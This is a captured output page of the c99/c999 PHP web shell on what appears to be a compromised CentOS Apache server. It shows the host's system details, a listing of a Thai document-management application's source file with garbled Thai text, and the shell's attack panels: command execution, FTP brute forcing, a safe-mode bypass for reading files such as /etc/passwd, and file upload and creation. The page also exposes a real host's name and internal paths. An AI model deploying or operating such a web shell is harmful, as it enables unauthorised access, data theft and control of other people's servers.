!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/person/admin/   drwxr-xr-x
Free 52.31 GB of 127.8 GB (40.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     entryDoc.php (25.73 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
SearchMaxDocGroup(); $personId=$oU->userPsCode; if($searchName!=""){ $flagshow=1; } $oDbx2->SearchBypersonIdNoDelFolderlimit($personId); $oDbx2->GetRecord(); $docshow=$oDbx2->DocInboxID; $docnameshow=$oDbx2->InboxName; */ ?>
">˹ѧÊ×Íà¢éÒ
" size="3"> ˹ѧÊ×Íà¢éÒ    
ÂéÒÂä»·Õè ¨Ñ´¡ÒÃâ¿Åà´ÍÃì  ">¨Ñ´¡ÒÃâ¿Åà´ÍÃì 
" size="2">   ÃÒ¡ÒÃ˹ѧÊ×Íà¢éÒ·ÕèÂѧäÁèä´éÍèÒ¹ áÅÐ˹ѧÊ×Í·ÕèÍèÒ¹áÅéÇ
"> SearchBypersonIdDrsDelete($personId); while($oRs2->GetRecord()){ //echo "gtrg==".$oRs2->DocID; $oDoc2->SearchByKey($oRs2->DocID); $oDoc2->GetRecord(); if($oDoc2->DtID==$DtID || $DtID=="" || $DtID=="0"){ $numrow++; } } //echo "----------".$numrow; $numRow = $numrow; $total_page = (int)($numRow/$GLOBALS['PAGE_SIZE']); if(($numRow%$GLOBALS['PAGE_SIZE']) != 0) $total_page++; if(isset($page_id)) $start = $GLOBALS['PAGE_SIZE']*($page_id-1); else { $page_id = 1; $start = 0; } ?> SearchBypersonIdDrsDeleteLimit($personId, $start,$GLOBALS['PAGE_SIZE']); $i=0; while($oRs->GetRecord()){ $oDoc->SearchByKey($oRs->DocID); $oDoc->GetRecord(); if($oDoc->DtID==$DtID || $DtID=="" || $DtID=="0"){ if(($i%2) == 0) echo ""; else echo ""; ?> DslID=="0"){ $rapid="../picture/rapid0.jpg"; $rapidname=$oDsl2->SearchName(0); }else if($oDoc->DslID=="1"){ $rapid="../picture/rapid1.jpg"; $rapidname=$oDsl2->SearchName(1); }else if($oDoc->DslID=="2"){ $rapid="../picture/rapid2.jpg"; $rapidname=$oDsl2->SearchName(2); }else if($oDoc->DslID=="3"){ $rapid="../picture/rapid3.jpg"; $rapidname=$oDsl2->SearchName(3); }else{ $rapid="../picture/blank.gif"; $rapidname=""; }?> DclID=="0"){ $secret="../picture/secret0.jpg"; $secretname=$oDcl2->SearchName(0); }else if($oDoc->DclID=="1"){ $secret="../picture/secret1.jpg"; $secretname=$oDcl2->SearchName(1);}else if($oDoc->DclID=="2"){ $secret="../picture/secret2.jpg"; $secretname=$oDcl2->SearchName(2); }else if($oDoc->DclID=="3"){ $secret="../picture/secret3.jpg"; $secretname=$oDcl2->SearchName(3); }else if($oDoc->DclID=="4"){ $secret="../picture/secret4.jpg"; $secretname=$oDcl2->SearchName(4); }else{ $secret="../picture/blank.gif"; $secretname="";}?>
" size="2">·Õè/©ºÑº·Õè/¤ÃÑ駷Õè/àÅ¢·Õè " size="2">¨Ò¡/·ÕèÁÒ (µé¹àÃ×èͧ) " size="2">àÃ×èͧ/ÇèÒ´éÇ (ª¹Ô´Ë¹Ñ§Ê×Í) " size="2">Çѹ·Õèä´éÃѺ˹ѧÊ×Í ÂéÒÂä»·Õè
 DocNo; ?> DtID=="1" || $oDoc->DtID=="2" || $oDoc->DtID=="14"){ echo " ".$oDoc->DocFrom."
"; }else{ if($oDoc->DocPID=="0"){ $oDlc2->SearchByKey($oDoc->DlcID); $oDlc2->GetRecord(); $oDlp->SearchByKey($oDlc2->DlpID); $oDlp->GetRecord(); echo " ".$oDoc->DocFrom."
"; echo " (".$oDlp->DlpName.")"; $countdoc=checkCountDoc($oDoc->DocID); }else{ $oDoc4->SearchByKey($oDoc->DocPID); $oDoc4->GetRecord(); $oDlc2->SearchByKey($oDoc4->DlcID); $oDlc2->GetRecord(); $oDlp->SearchByKey($oDlc2->DlpID); $oDlp->GetRecord(); echo " ".$oDoc->DocFrom."
"; echo " (".$oDlp->DlpName.")"; $countdoc=checkCountDoc($oDoc->DocPID); } } ?> 		 DsID=="0"){ ?>˹ѧÊ×Í·ÕèÂѧäÁèä´éà»Ô´DsID=="4" && $countdoc!="0"){ ?> ÂѧäÁèä´éÍèÒ¹á¿éÁ˹ѧÊ×Í  DsID=="0"){ echo ""; } ?>DtID=="13"){ echo "ª×èͼÙéä´éÃѺ¡ÒÃÃѺÃͧ
".$oDoc->CertificatePs; }else{ echo $oDoc->DocSubject; } ?>DsID=="0"){ echo ""; } ?>   " size="2">SearchByKey($oDoc->DtID); $oDt->GetRecord(); echo "(".$oDt->DtName.")";?>DrsSendToPs=="Y"){ echo " [Ê觴èǹ] "; }?> 		DrsReceiveDate!="0000-00-00 00:00:00"){ list($DocD,$DocT) = split(' ',$oRs->DrsReceiveDate); echo abbreDate2($DocD,'/')."
".a2th($DocT); } ?>		 <? echo $rapidname; ?> <? echo $secretname; ?> DsID=="4" || $oRs->DsID=="5"){ ?>
" size="2">** äÁèÁÕÃÒ¡ÒÃ˹ѧÊ×Í·ÕèÊ觶֧¼ÙéÃѺ¼Ô´ªÍº **
˹éÒ-> ";}?>   

  " size="2"> style="display:none; cursor:pointer" style="display:''; cursor:pointer" onclick="up_downList('')">áÊ´§ áÊ´§ÃÒ¡ÒÃ˹ѧÊ×Íã¹â¿Åà´ÍÃì style="display:''; cursor:pointer" style="display:none; cursor:pointer" alt="«è͹" onClick="up_downList('')">«è͹ «è͹ÃÒ¡ÒÃ˹ѧÊ×Íã¹â¿Åà´ÍÃì
style="display:''; border-collapse:collapse" style="display:none; border-collapse:collapse" >
" size="2">¤é¹ËÒ˹ѧÊ×Í (àÃ×èͧ/ÇèÒ´éÇÂ) " size="2"> (·Õè/©ºÑº·Õè/¤ÃÑ駷Õè/àÅ¢·Õè)   
style="display:''; cursor:pointer; border-collapse:collapse" style="display:none; cursor:pointer; border-collapse:collapse" >
SearchByKey($selectdo2); $oDbx3->GetRecord(); $idInboxName=$oDbx3->InboxName; } $oldbox=$selectdo2; ?> ÂéÒÂ/àÅ×Í¡ä»·Õè 
" size="2">  
style="display:''; border-collapse:collapse" style="display:none; border-collapse:collapse" background="" > SearchBypersonIdDrsDelete2DrsInboxIDDrsflagReadsearchNo($personId,th2a($searchName),$idInbox,th2a($searchNo)); $numRow = $oRs4->NumRow(); $total_page = (int)($numRow/$GLOBALS['PAGE_SIZE']); if(($numRow%$GLOBALS['PAGE_SIZE']) != 0) $total_page++; if(isset($page_id)) $start = $GLOBALS['PAGE_SIZE']*($page_id-1); else { $page_id = 1; $start = 0; } //------------------------------- $oRs5->SearchBypersonId2DrsDeleteLimitDrsInboxIDDrsflagReadsearchNo($personId, $start, $GLOBALS['PAGE_SIZE'],th2a($searchName),$idInbox,th2a($searchNo)); $z=0; while($oRs5->GetRecord()){ $oDoc3->SearchByKey($oRs5->DocID); $oDoc3->GetRecord(); if(($z%2) == 0) echo ""; else echo ""; ?>
" size="2">·Õè/©ºÑº·Õè/¤ÃÑ駷Õè/àÅ¢·Õè " size="2">¨Ò¡/·ÕèÁÒ (µé¹àÃ×èͧ) " size="2">àÃ×èͧ/ÇèÒ´éÇ (ª¹Ô´Ë¹Ñ§Ê×Í) " size="2">Çѹ·Õèä´éÃѺ˹ѧÊ×Í ÂéÒÂ/àÅ×Í¡ä»·Õè
 DocNo; ?> DtID=="1" || $oDoc3->DtID=="2" || $oDoc3->DtID=="14"){ echo " ".$oDoc3->DocFrom."
"; }else{ if($oDoc3->DocPID=="0"){ $oDlc2->SearchByKey($oDoc3->DlcID); $oDlc2->GetRecord(); $oDlp->SearchByKey($oDlc2->DlpID); $oDlp->GetRecord(); echo " ".$oDoc3->DocFrom."
"; echo " (".$oDlp->DlpName.")"; $countdoc=checkCountDoc($oDoc3->DocID); }else{ $oDoc5->SearchByKey($oDoc3->DocPID); $oDoc5->GetRecord(); $oDlc2->SearchByKey($oDoc5->DlcID); $oDlc2->GetRecord(); $oDlp->SearchByKey($oDlc2->DlpID); $oDlp->GetRecord(); echo " ".$oDoc3->DocFrom."
"; echo " (".$oDlp->DlpName.")"; $countdoc=checkCountDoc($oDoc3->DocPID); } } ?> 		  DsID=="4" && $countdoc!="0"){ ?> ÂѧäÁèä´éÍèÒ¹á¿éÁ˹ѧÊ×Í DtID=="13"){ echo "ª×èͼÙéä´éÃѺ¡ÒÃÃѺÃͧ
".$oDoc3->CertificatePs; }else{ echo $oDoc3->DocSubject; } ?> DrsSendToPs=="Y"){ echo "[Ê觴èǹ] "; }?> 		DrsReceiveDate!="0000-00-00 00:00:00"){ list($DocD,$DocT) = split(' ',$oRs5->DrsReceiveDate); echo abbreDate2($DocD,'/')."
".a2th($DocT); } ?> 		DrsflagRead=="N"){ ?>
" size="2">** äÁèÁÕÃÒ¡ÒÃ˹ѧÊ×Íã¹â¿Åà´ÍÃì **
˹éÒ-> ";}?>   

" size="2"> ËÁÒÂà赯 :   " size="2">ËÁÒ¶֧˹ѧÊ×Í·ÕèÂѧäÁèä´éà»Ô´ÍèÒ¹    ÂѧäÁèä´éÍèÒ¹á¿éÁ˹ѧÊ×Í ËÁÒ¶֧ÂѧäÁèä´éÍèÒ¹á¿éÁ˹ѧÊ×Í
  " size="2">ªÑ鹤ÇÒÁàÃçÇ  RSDocSpeedLevel(); $r=0; while($oDsl->GetRecord()){ if($oDsl->DslID=="0"){ $picsp="../picture/rapid0.jpg"; }else if($oDsl->DslID=="1"){ $picsp="../picture/rapid1.jpg"; }else if($oDsl->DslID=="2"){ $picsp="../picture/rapid2.jpg"; }else if($oDsl->DslID=="3"){ $picsp="../picture/rapid3.jpg"; } else if($oDsl->DslID=="4"){ $picsp="../picture/rapid4.jpg"; } ?> DslName."  "; $r++; }?>
  " size="2">ªÑ鹤ÇÒÁÅѺ  RSDocSecretLevel(); $r=0; while($oDcl->GetRecord()){ if($oDcl->DclID=="0"){ $piccl="../picture/secret0.jpg"; }else if($oDcl->DclID=="1"){ $piccl="../picture/secret1.jpg"; }else if($oDcl->DclID=="2"){ $piccl="../picture/secret2.jpg"; }else if($oDcl->DclID=="3"){ $piccl="../picture/secret3.jpg"; } else if($oDcl->DclID=="4"){ $piccl="../picture/secret4.jpg"; } ?> DclName."  "; $r++; }?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.005 ]--